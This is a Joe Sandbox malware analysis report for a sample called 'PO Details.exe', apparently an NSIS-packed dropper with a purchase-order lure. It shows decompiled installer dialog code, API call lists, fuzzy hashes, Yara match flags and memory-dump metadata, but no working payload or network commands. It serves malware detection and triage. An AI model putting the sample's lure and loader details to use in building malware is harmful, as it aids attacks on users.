Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 0ace7dd340f464e4f6e60a0587c83798a9fee84c0299dc6499fa771c266bdfa1
Instruction ID: 48b894a6b6243f55f811ea40c192212472d129cd546c7318a3a4cbaf3ee199e0
Opcode Fuzzy Hash: 0ace7dd340f464e4f6e60a0587c83798a9fee84c0299dc6499fa771c266bdfa1
Instruction Fuzzy Hash: EFD05E73A201009BC700DFB8BE8545E73B8EA903293304837D442E20D1E6B898418628

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404858 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404858(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42c240; // 0x7acc34
				_v32 = _t82;
				_t2 = _t82 + 0x3c; // 0x0
				_t3 = _t82 + 0x38; // 0x0
				_t146 = ( *_t2 << 0xb) + 0x436000;
				_v12 =  *_t3;
				if(_a8 == 0x40b) {
					E00405A5B(0x3fb, _t146);
					E004066C0(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405A5B(0x3fb, _t146);
							if(E00405DEE(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406411(0x42b238, _t146);
							_t87 = E00406806(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406411(0x42b238, _t146);
								_t89 = E00405D91(0x42b238);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x42b238) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405D32(0x42b238);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x42b238) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404CF5(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x433edc; // 0x7b357c
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404CDD(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x42b228);
									} else {
										E00404C14(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x434fc4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404389(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42d258 == _t158) {
									E004047B1();
								}
								 *0x42d258 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x42d268;
							_v60 = E00404BAE;
							_v56 = _t146;
							_v68 = E0040644E(_t146, 0x42d268, _t167, 0x42ba40, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405CE6(_t146);
								_t125 =  *((intOrPtr*)( *0x434f14 + 0x11c));
								if( *((intOrPtr*)( *0x434f14 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Susendes\\Scrumption") {
									E0040644E(_t146, 0x42d268, _t167, 0, _t125);
									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
										lstrcatW(_t146, 0x432ea0);
									}
								}
								 *0x42d258 =  *0x42d258 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405D5D(_t146) != 0 && E00405D91(_t146) == 0) {
						E00405CE6(_t146);
					}
					 *0x433ed8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404367(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404367(_t167);
					E0040439C(_t166);
					_t138 = E00406806(8);
					if(_t138 == 0) {
						L53:
						return E004043CE(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x00404858
0x0040485e
0x00404864
0x00404868
0x0040486b
0x00404871
0x0040487f
0x00404882
0x0040488a
0x00404890
0x00404890
0x0040489c
0x0040489f
0x0040490d
0x00404914
0x004049eb
0x004049f2
0x00404a01
0x00404a01
0x00404a05
0x00404a0f
0x00404a1c
0x00404a1e
0x00404a1e
0x00404a2c
0x00404a33
0x00404a3a
0x00404a3d
0x00404a79
0x00404a7b
0x00404a81
0x00404a86
0x00404a8a
0x00404a8c
0x00404a8c
0x00404aa8
0x00000000
0x00404aaa
0x00404aad
0x00404abb
0x00404ac1
0x00404ac2
0x00404ac5
0x00404ac8
0x00000000
0x00404ac8
0x00404a3f
0x00404a41
0x00404a45
0x00000000
0x00000000
0x00000000
0x00000000
0x00404a47
0x00404a47
0x00404a54
0x00404a59
0x00000000
0x00000000
0x00404a5d
0x00404a5f
0x00404a5f
0x00404a68
0x00404a6a
0x00404a6f
0x00404a72
0x00404a77
0x00000000
0x00000000
0x00000000
0x00000000
0x00404a77
0x00404ad4
0x00404ade
0x00404ae1
0x00404ae4
0x00404aeb
0x00404aeb
0x00404aed
0x00404aed
0x00404af2
0x00404af4
0x00404afc
0x00404b03
0x00404b05
0x00404b10
0x00404b10
0x00404b05
0x00404b17
0x00404b20
0x00404b2a
0x00404b32
0x00404b4d
0x00404b34
0x00404b3d
0x00404b3d
0x00404b32
0x00404b52
0x00404b57
0x00404b5c
0x00404b65
0x00404b65
0x00404b6e
0x00404b70
0x00404b70
0x00404b7c
0x00404b84
0x00404b8e
0x00404b8e
0x00404b93
0x00000000
0x00404b93
0x00404a3d
0x004049f4
0x004049fb
0x00000000
0x00000000
0x00000000
0x004049fb
0x0040491a
0x00404923
0x0040493d
0x00404942
0x0040494c
0x00404953
0x0040495f
0x00404962
0x00404965
0x0040496c
0x00404974
0x00404977
0x0040497b
0x00404982
0x0040498a
0x004049e4
0x0040498c
0x0040498d
0x00404994
0x0040499e
0x004049a6
0x004049b3
0x004049c7
0x004049cb
0x004049cb
0x004049c7
0x004049d0
0x004049dd
0x004049dd
0x0040498a
0x00000000
0x00404942
0x00404930
0x00000000
0x00000000
0x00404936
0x00000000
0x004048a1
0x004048ae
0x004048b7
0x004048c4
0x004048c4
0x004048cb
0x004048d1
0x004048da
0x004048dd
0x004048e0
0x004048e8
0x004048eb
0x004048ee
0x004048f4
0x004048fb
0x00404902
0x00404b99
0x00404bab
0x00404908
0x0040490b
0x00000000
0x0040490b
0x00404902

APIs

GetDlgItem.USER32(?,000003FB), ref: 004048A7
SetWindowTextW.USER32(00000000,-00436000), ref: 004048D1
SHBrowseForFolderW.SHELL32(?), ref: 00404982
CoTaskMemFree.OLE32(00000000), ref: 0040498D
lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,-00436000), ref: 004049BF
lstrcatW.KERNEL32(-00436000,Call), ref: 004049CB
SetDlgItemTextW.USER32(?,000003FB,-00436000), ref: 004049DD

Part of subcall function 00405A5B: GetDlgItemTextW.USER32(?,?,00000400,00404A14), ref: 00405A6E

Part of subcall function 004066C0: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76693420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO Details.exe" ,004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00406723
Part of subcall function 004066C0: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406732
Part of subcall function 004066C0: CharNextW.USER32(?,00000000,76693420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO Details.exe" ,004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00406737
Part of subcall function 004066C0: CharPrevW.USER32(?,?,76693420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO Details.exe" ,004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 0040674A

GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,-00436000,00000001,0042B238,-00436000,-00436000,000003FB,-00436000), ref: 00404AA0
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404ABB

Part of subcall function 00404C14: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404CB5
Part of subcall function 00404C14: wsprintfW.USER32 ref: 00404CBE
Part of subcall function 00404C14: SetDlgItemTextW.USER32(?,0042D268), ref: 00404CD1

Strings

A, xrefs: 0040497B
C:\Users\user\AppData\Local\Temp\Susendes\Scrumption, xrefs: 004049A8
Call, xrefs: 004049B9, 004049BE, 004049C9
|5{, xrefs: 00404B17

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp\Susendes\Scrumption$Call$|5{
API String ID: 2624150263-2407721299
Opcode ID: a29f11494786f4983dde6a8903936fd5a0c5e75438e421a64f0c20d1c4fa2cb5
Instruction ID: 0d1333b798dde08b2b35772059431d035751c92a28532a026af6b574b599a32b
Opcode Fuzzy Hash: a29f11494786f4983dde6a8903936fd5a0c5e75438e421a64f0c20d1c4fa2cb5
Instruction Fuzzy Hash: 56A15EF1A00209ABDB11AFA5CD45AAFB7B8EF84314F10843BF601B62D1D77C99418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 02A91DBB Relevance: 5.7, Strings: 4, Instructions: 744COMMON

Download Yara Rule

Strings

^V~[, xrefs: 02A91DC5
B, xrefs: 02A83FBC
3\Ve, xrefs: 02A91F07
}, xrefs: 02A83FC8

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: 3\Ve$B$^V~[$}
API String ID: 2706961497-296135224
Opcode ID: 1196f2759560458aeb9856f076e46d6ec919b134ec2d197b8b19345821e3db8f
Instruction ID: 1f577305df4475bd96ccff995a9b137886b66978479c658accfa0a8d5217a919
Opcode Fuzzy Hash: 1196f2759560458aeb9856f076e46d6ec919b134ec2d197b8b19345821e3db8f
Instruction Fuzzy Hash: A3525A315083C59FDF25CF38C9987DA7BE2AF52360F49829ACC998F296D7348546CB12

Uniqueness

Uniqueness Score: -1.00%

Function 02A9305C Relevance: 4.3, Strings: 3, Instructions: 560COMMON

Download Yara Rule

Strings

<\Q, xrefs: 02A93523
gR_{, xrefs: 02A93351
?5, xrefs: 02A933A6

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID: gR_{$<\Q$?5
API String ID: 0-223836159
Opcode ID: 66716f122887298f631f741ea1c165c6699aa39b0c7fb30aa5d5b781bef10c8e
Instruction ID: ae05beec401ad216d1c6a712fde8f880bb4c39d066da6da56b69fe99677bbcbd
Opcode Fuzzy Hash: 66716f122887298f631f741ea1c165c6699aa39b0c7fb30aa5d5b781bef10c8e
Instruction Fuzzy Hash: ECE1CB7217CA790FEB1C9F3998CA13E7296F7C66213B0D76EC483C658BF92598834164

Uniqueness

Uniqueness Score: -1.00%

Function 02A87BCD Relevance: 4.0, Strings: 3, Instructions: 261COMMON

Download Yara Rule

Strings

%VC6, xrefs: 02A87EBB
uQW, xrefs: 02A87E85
B, xrefs: 02A87C20

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID: %VC6$B$uQW
API String ID: 0-1232823685
Opcode ID: d5aeee2aa6d960b9b7f1ec3f621d6d79e4afb76ad57439880b25db6af5030242
Instruction ID: b5331f2bebf3168a82b28694c69d6c3245fac0e5ebf13df10a7ae0d9d3561596
Opcode Fuzzy Hash: d5aeee2aa6d960b9b7f1ec3f621d6d79e4afb76ad57439880b25db6af5030242
Instruction Fuzzy Hash: D9A1F07160838A9FDB308F38CD947EE7BE6AF41384F54462EDC889B241D7759A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02A86A70 Relevance: 4.0, Strings: 3, Instructions: 217COMMON

Download Yara Rule

Strings

(@F, xrefs: 02A8661D
B, xrefs: 02A86AC4
q6?, xrefs: 02A8666A

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID: (@F$B$q6?
API String ID: 0-4228367602
Opcode ID: f254ab5373283da771bbc93a7d69cbc9ce71782efa5a979f28434cff94192c1a
Instruction ID: 49bd80243b8339cbf8a6cb6672ce6852a1da0debea17b60087a4955c0f9d4941
Opcode Fuzzy Hash: f254ab5373283da771bbc93a7d69cbc9ce71782efa5a979f28434cff94192c1a
Instruction Fuzzy Hash: D581CC7064438A8BEB359F38DDA47CA3FE6AF95394F44813ECC894B642CB715A46CB01

Uniqueness

Uniqueness Score: -1.00%

Function 02A866D6 Relevance: 4.0, Strings: 3, Instructions: 214COMMON

Download Yara Rule

Strings

(@F, xrefs: 02A8661D
B, xrefs: 02A86718
q6?, xrefs: 02A8666A

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID: (@F$B$q6?
API String ID: 0-4228367602
Opcode ID: 4e22e7f688504978e17d602304470bdafc25646ccae9e2c231c52a13bcad236a
Instruction ID: 443dcf6f0389b195ebe5eeca4880fd64553d2228bf7a91342315f12424f04c28
Opcode Fuzzy Hash: 4e22e7f688504978e17d602304470bdafc25646ccae9e2c231c52a13bcad236a
Instruction Fuzzy Hash: CE81CB7164438A8BEB359F38DDA47CA3FA6AF95384F44813ECC894B642CB714A46CB01

Uniqueness

Uniqueness Score: -1.00%

Function 02A86595 Relevance: 4.0, Strings: 3, Instructions: 214COMMON

Download Yara Rule

Strings

(@F, xrefs: 02A8661D
q6?, xrefs: 02A8666A
B, xrefs: 02A865D0

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID: (@F$B$q6?
API String ID: 0-4228367602
Opcode ID: 42db9e026716abf427c0725b9b2816cc7dcc86573b1457153757959697c63c96
Instruction ID: 132d77972c397499014c43e302547cb5b5278675a2d7003cb976b40373ec785a
Opcode Fuzzy Hash: 42db9e026716abf427c0725b9b2816cc7dcc86573b1457153757959697c63c96
Instruction Fuzzy Hash: D281CA7164438A8BEF359F38DDA47CA3BA7AF95384F44813ECC894B245DB714A42CB01

Uniqueness

Uniqueness Score: -1.00%

Function 02A86940 Relevance: 4.0, Strings: 3, Instructions: 209COMMON

Download Yara Rule

Strings

(@F, xrefs: 02A8661D
q6?, xrefs: 02A8666A
B, xrefs: 02A8697C

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID: (@F$B$q6?
API String ID: 0-4228367602
Opcode ID: 6497b9929c1440ed10d87f72c205abe46fddd436c23cbc31c78fa59cbc32c309
Instruction ID: 6b8e9039063111b7c85195104aad0ad0b266241edf201e0e3e7f1cc2777848b7
Opcode Fuzzy Hash: 6497b9929c1440ed10d87f72c205abe46fddd436c23cbc31c78fa59cbc32c309
Instruction Fuzzy Hash: B481BC7164438A8BEB359F38DDA47CA3BA6AF95384F44813ECC894B646DB714A46CB01

Uniqueness

Uniqueness Score: -1.00%

Function 02A87D06 Relevance: 3.9, Strings: 3, Instructions: 194COMMON

Download Yara Rule

Strings

B, xrefs: 02A87D24
%VC6, xrefs: 02A87EBB
uQW, xrefs: 02A87E85

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID: %VC6$B$uQW
API String ID: 0-1232823685
Opcode ID: 488ccda836a2657af4bf03c568f2382ed02a877282a59cac1089d48825780aab
Instruction ID: 505ea7fcb4881c14ab8f6d3d55fdb04033d912413ca807f3439b14d54436a168
Opcode Fuzzy Hash: 488ccda836a2657af4bf03c568f2382ed02a877282a59cac1089d48825780aab
Instruction Fuzzy Hash: 4F71EC7560838A9FDB30CF388D947EA7BE6AF45350F54862EDC889B241D7349A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02A87E38 Relevance: 3.9, Strings: 3, Instructions: 130COMMON

Download Yara Rule

Strings

%VC6, xrefs: 02A87EBB
B, xrefs: 02A87E68
uQW, xrefs: 02A87E85

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID: %VC6$B$uQW
API String ID: 0-1232823685
Opcode ID: f5fbad4a6f3e18f591e5ef549ec84ee427283f948e27584287900a19f2bf8ad7
Instruction ID: 3ecda014f8bd6309d7b56254d52c09a2d90cdf3bf47e9c126baf14ff446347e6
Opcode Fuzzy Hash: f5fbad4a6f3e18f591e5ef549ec84ee427283f948e27584287900a19f2bf8ad7
Instruction Fuzzy Hash: 695130702483858FDB309E38CD957EE7BE5AF41744F94861EECC89B182D7349A88CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02A87B97 Relevance: 2.8, Strings: 2, Instructions: 278COMMON

Download Yara Rule

Strings

%VC6, xrefs: 02A87EBB
uQW, xrefs: 02A87E85

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID: %VC6$uQW
API String ID: 0-687980269
Opcode ID: 7c88b9cb3d584c8d9189e68e73a032d79f5bf2ff09f3848ccadff781d3b25c7b
Instruction ID: 71ea2a8f6a066726c7fae8ed9086024ed31fa04c3e4d96aa2a39151c89dad698
Opcode Fuzzy Hash: 7c88b9cb3d584c8d9189e68e73a032d79f5bf2ff09f3848ccadff781d3b25c7b
Instruction Fuzzy Hash: 83A14276A083469FDB349E38CD947EE77E6AF90740F51462EDC89DB240E7309A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02A864F0 Relevance: 2.7, Strings: 2, Instructions: 241COMMON

Download Yara Rule

Strings

(@F, xrefs: 02A8661D
q6?, xrefs: 02A8666A

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID: (@F$q6?
API String ID: 0-4257655905
Opcode ID: d4783113f00a06aea26b98b1c0ff8ea6723eeff790ed23079f95b029e45ed902
Instruction ID: 4a95270299fc6b1df0f03424bd9153da2cb1f9bdd1a7a6c09327882101e51567
Opcode Fuzzy Hash: d4783113f00a06aea26b98b1c0ff8ea6723eeff790ed23079f95b029e45ed902
Instruction Fuzzy Hash: 399167B164438A8FEB34AF29CD947DA37A7EF98350F95803ACC4A9B204DB314942CB01

Uniqueness

Uniqueness Score: -1.00%

Function 02A86735 Relevance: 2.7, Strings: 2, Instructions: 209COMMON

Download Yara Rule

Strings

(@F, xrefs: 02A8661D
q6?, xrefs: 02A8666A

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID: (@F$q6?
API String ID: 0-4257655905
Opcode ID: 64fcbb6e824ab76da7c1466c6f9b133f7efdb1770fa2b5118e2b60776068df95
Instruction ID: 44fbecd51f8a98898fdb3f1dc7fda434674cd5c5ec4720426c9d3f8ff9f47675
Opcode Fuzzy Hash: 64fcbb6e824ab76da7c1466c6f9b133f7efdb1770fa2b5118e2b60776068df95
Instruction Fuzzy Hash: F47168B154434A8BEF39AE28DDA07DA3BA3AF99350F55803ECC8A5B305DB315943CB11

Uniqueness

Uniqueness Score: -1.00%

Function 02A868BE Relevance: 2.7, Strings: 2, Instructions: 197COMMON

Download Yara Rule

Strings

(@F, xrefs: 02A8661D
q6?, xrefs: 02A8666A

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID: (@F$q6?
API String ID: 0-4257655905
Opcode ID: 7a4cdde241b9366a1d0ecd1969f606de6e7b2e067f5f4c429bbaf58933912deb
Instruction ID: a2a8b59fd1a1de2e88654daf5b8e36df878771c024265dfbf3ed02352d1773b7
Opcode Fuzzy Hash: 7a4cdde241b9366a1d0ecd1969f606de6e7b2e067f5f4c429bbaf58933912deb
Instruction Fuzzy Hash: C47167B194434A8BEF38AE289D907DA3BA3AFA8350F55413ECC4A9B344DB314942CB11

Uniqueness

Uniqueness Score: -1.00%

Function 02A86837 Relevance: 2.7, Strings: 2, Instructions: 194COMMON

Download Yara Rule

Strings

(@F, xrefs: 02A8661D
q6?, xrefs: 02A8666A

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID: (@F$q6?
API String ID: 0-4257655905
Opcode ID: 85130f0ca219603d968a32cd343ca1de64ec48b7e2a91b3b701971135762e56b
Instruction ID: f4fd19f9af26ccdc2af8d833307183ebaaaeba87c17f124f95b86cfebdd9a0a6
Opcode Fuzzy Hash: 85130f0ca219603d968a32cd343ca1de64ec48b7e2a91b3b701971135762e56b
Instruction Fuzzy Hash: 7E7178B154434A8BEF38AF29DD947DA3BA3AF98350F55813ECC4A9B304DB314942CB01

Uniqueness

Uniqueness Score: -1.00%

Function 02A867CC Relevance: 2.7, Strings: 2, Instructions: 194COMMON

Download Yara Rule

Strings

(@F, xrefs: 02A8661D
q6?, xrefs: 02A8666A

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID: (@F$q6?
API String ID: 0-4257655905
Opcode ID: 375d8eec291c8996a12490e1105558cbed3826d2418656bc9c2e0bd1222a95bc
Instruction ID: d461e615e852b8a0429b643aaea8625f9355f465317452ccd3ec7b274a33c633
Opcode Fuzzy Hash: 375d8eec291c8996a12490e1105558cbed3826d2418656bc9c2e0bd1222a95bc
Instruction Fuzzy Hash: 137167B154434A8BEF38AF29DD947DA3BA3AF98350F55813ECC4A9B304DB314942CB01

Uniqueness

Uniqueness Score: -1.00%

Function 02A89F0A Relevance: 2.7, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

p@m, xrefs: 02A8A084
zI, xrefs: 02A944F1

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID: p@m$zI
API String ID: 0-1612002943
Opcode ID: 96ab73ef06ea8ad0d0dac9ce076ed2303338c9d438b44be88beefd802b993f4a
Instruction ID: 1295b5fafdb5a8d23f47d8f3b303cdaf1fa962b8d13d6c245458716e29e1cfef
Opcode Fuzzy Hash: 96ab73ef06ea8ad0d0dac9ce076ed2303338c9d438b44be88beefd802b993f4a
Instruction Fuzzy Hash: 5E513475A403068FDB209F6AC988BDAB7F9BF19350F854169DC8A9B211DB34CD81CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02A80175 Relevance: 2.1, Strings: 1, Instructions: 836COMMON

Download Yara Rule

Strings

=, xrefs: 02A80948

Memory Dump Source

